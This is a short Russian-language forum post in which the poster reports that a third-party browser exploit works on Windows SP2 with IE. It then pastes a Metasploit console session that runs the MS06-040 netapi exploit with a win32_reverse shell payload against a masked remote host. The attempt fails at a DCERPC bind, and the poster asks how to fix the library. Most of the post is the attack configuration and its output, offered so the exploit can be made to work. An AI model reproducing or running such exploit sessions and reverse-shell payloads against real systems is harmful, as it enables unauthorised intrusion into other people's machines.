Затестил сплоит от jamikazu - работает на SP2+IE
Провериться на запуск калькулятора можно Тут

А от метасплоита что-то не пашет (удалённый)

msf > cd framework
msfconsole: chdir: changed to directory framework
msf > use netapi_ms06_040
msf netapi_ms06_040 > set RHOST хх.хх.хх.2
RHOST -> хх.хх.хх.2
msf netapi_ms06_040 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf netapi_ms06_040(win32_reverse) > set LHOST хх.хх.хх.1
LHOST -> хх.хх.хх.1
msf netapi_ms06_040(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] WARNING: Failed to create pipe to \BROWSER: Create returned NT status 0xc0000034 at /home/framework/lib/Pex/DCERPC.pm line 869.
[*] Could not bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:хх.хх.хх.2[\BROWSER]
[*] Exiting Reverse Handler.
msf netapi_ms06_040(win32_reverse) >

Что то не так в либе DCERPC.pm ? (или она старой версии?)